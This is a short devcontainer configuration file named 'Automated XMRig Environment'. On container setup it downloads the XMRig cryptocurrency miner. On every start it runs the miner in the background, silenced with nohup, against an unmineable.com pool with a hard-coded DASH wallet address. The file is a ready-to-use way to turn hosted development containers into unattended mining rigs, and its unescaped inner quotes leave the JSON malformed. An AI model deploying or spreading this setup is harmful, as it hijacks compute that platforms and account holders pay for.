{
    "name": "Automated XMRig Environment",
    "image": "mcr.microsoft.com/devcontainers/base:ubuntu",
    "updateContentCommand": "sudo apt-get update && sudo apt-get install -y wget tar && wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz && tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz",
    "postStartCommand": "nohup bash -c "cd ${containerWorkspaceFolder}/xmrig-6.22.2 && ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DASH:XcufdyxZtL4JUjALZfTq6pCrxyTt2Hy2Zu.sal909 -p x --tls --threads=4 --log-file=/tmp/xmrig.log" > /dev/null 2>&1 &",
  "postAttachCommand": "tail -f /tmp/xmrig.log"
}
